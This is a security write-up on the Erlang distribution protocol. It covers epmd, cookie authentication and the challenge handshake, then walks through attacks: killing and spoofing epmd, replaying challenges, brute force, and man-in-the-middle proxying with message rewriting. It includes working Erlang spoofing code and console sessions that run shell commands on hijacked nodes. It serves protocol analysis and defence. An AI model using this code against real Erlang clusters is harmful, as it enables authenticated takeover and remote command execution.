Fix anomalies in epmd not yet reported as security issues Use erts_(v)snprintf to ensure no buffer overruns in debug printouts. Disallow everything except port and name requests from remote nodes. Disallow kill command even from localhost if alive nodes exist. -relaxed_command_check when starting epmd returns the possibility to kill this epmd when nodes are alive (from localhost). Disallow stop command completely except if -relaxed_command_check is given when epmd was started. Environment variable ERL_EPMD_RELAXED_COMMAND_CHECK can be set to always get -relaxed_command_check.
Fortunately (for those wishing to spoof the protocol), there are still other ways to kill epmd.
Awesome work by the Erlang/OTP team!)
One of the unique features of the Erlang programming language is the transparent, built in distribution. The unit of activity in Erlang is the process. Processes run on nodes which reside locally or on remote servers, communicating by message passing. If a process somewhere crashes, a linked process running on another server can detect the crash and perform error recovery.
Erlang distribution is very easy to use, pretty much working out of the box. But, in the default configuration, it's often advised that the Erlang distribution protocol is insecure and should only be run on trusted networks:
[The cookie authentication mechanism] is not entirelly safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.So the questions are: what are the risks in running a distributed Erlang node, where can distribution be used safely and what can be done to limit potential attacks against it?
Source code is available on github.
Erlang Distribution
The Erlang Port Mapper Daemon
Distributed Erlang nodes bind a random TCP port for distribution requests. The Erlang port mapper daemon, or epmd, maps the name of the node to the port on which the node is listening.epmd acts as a key/value store. A node registers with epmd by opening a TCP connection to localhost on a well known port (4396). The node sends a message containing the node name and distribution port. The node is now registered and will remain registered until the TCP connection is dropped.
An example of a registration message is:
register({IP, Port}, Key, Value) -> Packet = << 120, % ALIVE2_REQ response: x Value:16, % PortNo 77, % NodeType: normal Erlang node 0, % Protocol: TCP 0,5, % Highest Version 0,5, % Lowest Version (byte_size(Node)):16, % NLen Node/bytes, % NodeName 0,0 % ELen >>, {ok, Socket} = gen_tcp:connect(IP, Port, [ {packet,2}, {active, true}, binary ]), ok = gen_tcp:send(Socket, Packet), wait(Socket). wait(Socket) -> receive _ -> wait(Socket) end.
A Distributed Erlang Node
A node is started in distributed mode when the -sname or -name option is passed on the command line to the erl command. Erlang will start an epmd process if one is currently not running.When a request is made to connect to another distributed Erlang node, for example by using net_adm:ping('node@example.com'), the Erlang node will resolve the portion of the node name after the @ symbol (or use localhost, if the node is brought up using -sname), and send a PORT_PLEASE2_REQ request for the name (the portion of the atom preceding the @ sign) to the resolved IP address. epmd responds with a message containing the node's port and closes the connection.
The originating Erlang node now opens a TCP connection to the destination Erlang node's distribution port. The nodes authenticate each other using the Erlang cookie mechanism. If the challenge handshake succeeds, the nodes are connected. Communication is bidirectional. This link will be used for all distributed operations between the two nodes.
Erlang Cookies
Erlang cookie authentication resembles RADIUS, CHAP and X11 magic cookies. Cookies are a secret that must be known on all members of the Erlang cluster. Valid characters in a cookie are ASCII 32-126 (space to tilde).Generating the Erlang Cookie
If a secret is not provided, Erlang will generate a 20 byte file in the user's home directory (~/.erlang.cookie) composed of uppercase letters. Erlang uses a weak pseudo-random number generator with an implementation similar to rand(3). The seed is the seconds and microseconds fields of erlang:now(). The returned random value acts as the seed for the next random value until 20 uppercase letters are chosen. The creation time of the ~/.erlang.cookie file is changed to midnight to obscure the initial seed value.The Challenge Handshake
The challenge process is explained in the Erlang kernel documentation.After the TCP connection is established, the originating node sends:
- "n"
- Version0
- Version1
- Flag0
- Flag1
- Flag2
- Flag3
- Name0
- Name1
- Name2
- ...
- NameN
The destination node replies with a status message indicating how the originating node may proceed. For example, the connection might not be allowed because a connection is in progress or might already exist.
- "s"
- Status0
- Status1
- ...
- StatusN
- "n"
- Version0
- Version1
- Flag0
- Flag1
- Flag2
- Flag3
- Challenge0
- Challenge1
- Challenge2
- Challenge3
- Name0
- Name1
- Name2
- ...
- NameN
%% --------------------------------------------------------------- %% Challenge code %% gen_challenge() returns a "random" number %% --------------------------------------------------------------- gen_challenge() -> {A,B,C} = erlang:now(), {D,_} = erlang:statistics(reductions), {E,_} = erlang:statistics(runtime), {F,_} = erlang:statistics(wall_clock), {G,H,_} = erlang:statistics(garbage_collection), %% A(8) B(16) C(16) %% D(16),E(8), F(16) G(8) H(16) ( ((A bsl 24) + (E bsl 16) + (G bsl 8) + F) bxor (B + (C bsl 16)) bxor (D + (H bsl 16)) ) band 16#ffffffff.The originating node computes the digest by concatenating the challenge with the cookie and digesting the result using MD5:
%% Generate a message digest from Challenge number and Cookie gen_digest(Challenge, Cookie) when is_integer(Challenge), is_atom(Cookie) -> erlang:md5([atom_to_list(Cookie)|integer_to_list(Challenge)]).The resulting 16 byte MD5 digest is sent to the destination node along with a new 4 byte challenge.
- "r"
- Challenge0
- Challenge1
- Challenge2
- Challenge3
- Digest0
- Digest1
- Digest2
- ...
- Digest15
- "a"
- Digest0
- Digest1
- Digest2
- ...
- Digest15
Abusing epmd
Running epmd
epmd comes from an environment where physical servers are dedicated to a single task. Probably all Erlang nodes ran under a single UID.On multiuser systems, such as development servers or systems that require some privilege separation, the first Erlang node to run starts and controls the epmd process. This user can now control the port map requests given for other nodes. The user running epmd can also snoop name requests.
The temptation might be to explicitly start epmd as root at boot. Use a dedicated user, there's no reason to run as root.
epmd Authentication
epmd only requires a few operations: registering a node name and port, retrieving a port based on node name, retrieving all names and ports known to the epmd process (as well as some debug info, if requested), and shutting down epmd.Though logically these operations are distinct for remote and local access (a remote node, for example, would never register a node/port value, since ports are local to the node and do not include the IP address; in fact, the epmd command line flags such as "-names" will only connect to localhost), no distinction is made between local and remote access to epmd. Authentication is not required to query epmd.
Any device that is allowed to open a TCP connection to the epmd port can:
- issue a kill command and shut down the epmd process: any new attempts at joining in Erlang distribution with nodes residing on this server will fail
- set any key/value pair
- bypass network segmentation: if 2 hosts can talk to the host running epmd but not each other
- establish a covert channel
- interprocess communication, like a command queue for bots
- tunnelling data: TCP over epmd over TCP!
- storage of data: the basis of a FUSE filesystem
Abusing Cookies
The cookie mechanism only proves that, for the given TCP connection, there is knowledge of the secret. Though the node names are included in the challenge message, they are not included in the digest. Similarly, neither IP addresses or timestamps are included in the digest. The Erlang cookie authentication also does not validate the data sent after the handshake is completed, so there is no integrity checking built into the distribution protocol.Replaying the Challenge
Erlang cookies are generated by concatenating a 4 byte challenge with a secret and digesting the result using MD5. The Erlang kernel documentation for this process notes the 32-bit integer used as the challenge must be very random, but really it needs only to be well distributed. The response to the challenge proves the node knows the secret. At least in theory, the only practical way to derive the secret from the digest is using brute force. But knowing the response to the challenge is equivalent to knowing the secret, if the challenge is ever repeated. The strength of the cookie mechanism lies in the time before a challenge is repeated.1> cookie:start(). {11487, {found,{3534940387,971}, [88321801,88780553,92321534,93695753,94154505,94809865, 95268617,96843513,97367801,97957625,98481913,99071742, 99596030,100120318,100644606,172271960,172796248,173320536, 174041432,176726281,177250569,177774857,178561289, 179085577|...]}}In the above test, an attacker would have had to snoop 971 handshakes before there is a repeated challenge. There are 2 challenges for each authentication. Only one successful connection is needed since the attacker can run erlang:get_cookie() once authenticated. However, being able to replay a challenge requires being able to somehow snoop connections. And for most systems, authentication is a rare event, since TCP connections for internode communication are persistent.
Brute Force
Since all nodes share the same cookie, and given that cookies likely change very rarely, its possible for the attacker to open connections to each node and brute force in parallel. Since MD5 is quite fast, and there is no provision in the protocol to slow down the digesting process, many attacks can be run.MITM
For many environments, the threat of replay and brute force might not be that bad. While they are feasible, if you do any sort of monitoring, you'll very likely notice an attack in progress. The lack of any sort of integrity protection is a real issue; one that Erlang developers have addressed, to an extent, with the SSL transport mechanism.Proxying from a Local Node
Since anyone can stop epmd, an attacker on the same server can bring up their own port mapper service. When epmd is killed, the attached Erlang nodes will not attempt to reconnect. An attacker can listen on any available port, open a connection to the distribution port of the Erlang node that is being targeted and advertise the port of the spoofing proxy to any distribution requests. spoofed contains some code to demonstrate this sort of attack. First, we retrieve the ports known to epmd by sending a name request (the letter "n", with a 2 byte length header):names(IP, Port) -> Packet = list_to_binary([<<110>>]), {ok, Socket} = gen_tcp:connect(IP, Port, [ {packet,2}, {active, true}, binary ]), ok = gen_tcp:send(Socket, Packet), wait(Socket).Next, we set up a fake epmd to answer port map requests. The fake empd binds the well-known epmd port and spawns a process to handle each TCP connection. For most message types, the client expects epmd to close the connection after responding. The exception is node registration: breaking the connection will deregister the node.
loop(Socket, Port) -> receive {tcp, Socket, <<110>>} -> inet:setopts(Socket, [{packet, 0}]), Response = list_to_binary([ <<4396:32>>, lists:flatten(io_lib:format("I can haz ~s at port ~p~n", ["fake", Port])) ]), error_logger:info_report([{epmd, names_request}, {response, Response}]), ok = gen_tcp:send(Socket, Response); {tcp, Socket, <<122, Node/binary>>} -> inet:setopts(Socket, [{packet, 0}]), Response = << 119, % PORT_PLEASE2_REQ response 0, % Result: no error Port:16, % PortNo 77, % NodeType: normal Erlang node 0, % Protocol: TCP 0,5, % Highest Version 0,5, % Lowest Version (byte_size(Node)):16, % NLen Node/bytes, % NodeName 0,0 % ELen >>, error_logger:info_report([{epmd, Node}, {response, Response}]), ok = gen_tcp:send(Socket, Response); {tcp_closed, Socket} -> error_logger:info_report([{epmd, tcp_close}]); {tcp_error, Socket} -> error_logger:info_report([{epmd, tcp_error}]) end.Finally, we set up the proxy to listen on the fake Erlang distribution port. The proxy just proxies any data, including the challenge handshake. Since the origin and destination nodes presumably share a common cookie, the authentication will succeed. Assuming 59000 is the distribution port of the Erlang node and port 59001 is unbound, we could run a proxy as follows:
spoof:kill(). spoof:epmd(59001). % where the argument is where our proxy port will be listening spoof:proxy(59000, 590001). % Erlang distribution port, fake Erlang node proxy port.At this point we can snoop the data being sent between nodes. Of course, we still do not know the cookie, only a derived secret (probably 2 of them), but the TCP connection from our proxy is fully authenticated. We could drop the connection to the originating node at this point and send our own messages as a fully connected distributed node:
(n@ack.lan)1> erlang:get_cookie(). mysecretcookieHowever, we can also modify the connection in interesting ways:
1>F = fun(in,X) -> re:replace(X, "foo", "bar", [{return, binary}]); 1> (out,X) -> X end. 2>spoof:proxy(59000, 590001, F). 3>foo == bar. true 4>Afoo = 123. 123 5>Afoo. 123 6>Abar. 123 7>rpc:call('n@ack.lan', os, cmd, ["echo foofoo"]). "barfoo\n" 8> rpc:call('n@ack.lan', os, cmd, ["touch /tmp/ohaifoothere"]). [] 9> rpc:call('n@ack.lan', os, cmd, ["ls /tmp/ohaifoothere"]). "/tmp/ohaibarthere"
Proxying from a Remote Node
Assuming an attacker can convince an Erlang node to connect to a host under their control (using DNS poisoning, ARP spoofing, social engineering, ...), the attacker can proxy the connection anywhere. There's a problem with proxying a connection from a host to a node that is not local, though. The challenge messages contain the full name of the node that is sending the message, including the domain name. Assume there are 3 nodes: nul.lan (the originating node), ecn.lan (the destination node) and ack.lan (the attacker). If an Erlang node on nul.lan accidentally connects to ack.lan intending to reach ecn.lan (or any other node sharing the same cookie), ack.lan can forward the connection to ecn.lan. nul.lan may not even have intended to connect to ecn.lan.spoof:kill(). spoof:epmd(59001). spoof:proxy({{10,10,10,10},59000}, 590001, F).Since the source/destination node names will not match, we will need to re-write them for this to work, but since there are no integrity checks, the process works transparently:
F = fun(in,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]); (out,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]) end.
Forcing a Node to Connect to Itself
Even on a network where the attacker does not know which nodes share the same cookie, an Erlang node can always be forced to connect to itself. Since the Erlang node will use its cookie for both sides of the authentication, it will, of course, succeed. The attacker will only need to rewrite the node names. e.g., if ecn.lan thinks it's talking to ack.lan:1> F = fun(in,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]); 1> (out,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]) end. 2> spoof:proxy({IP, Port}, ProxyPort, F). erl -name r@nul.lan -remsh n@ack.lan 1> os:cmd("hostname"). "ecn.lan\n"This would work, for example, against a user connecting from a laptop to a node using erl -remsh or doing a etop:start([{node, 'node@example.com'}]). (It's worth mentioning as well, since I've never seen it discussed, that if you connect in to a distributed Erlang node, everybody who's authenticated to connect to that node has complete access to your workstation as your uid.)
"Legitimate" Uses
spoofed could be used as an example for creating an epmd that provides some protection against remote nodes abusing it and for creating Erlang distribution proxies. An Erlang distribution proxy could potentially have these advantages:- listens only to a single port
- authentication mechanisms (GSS-API, SSL, etc)
- could allow creating sandboxes by parsing the distribution messages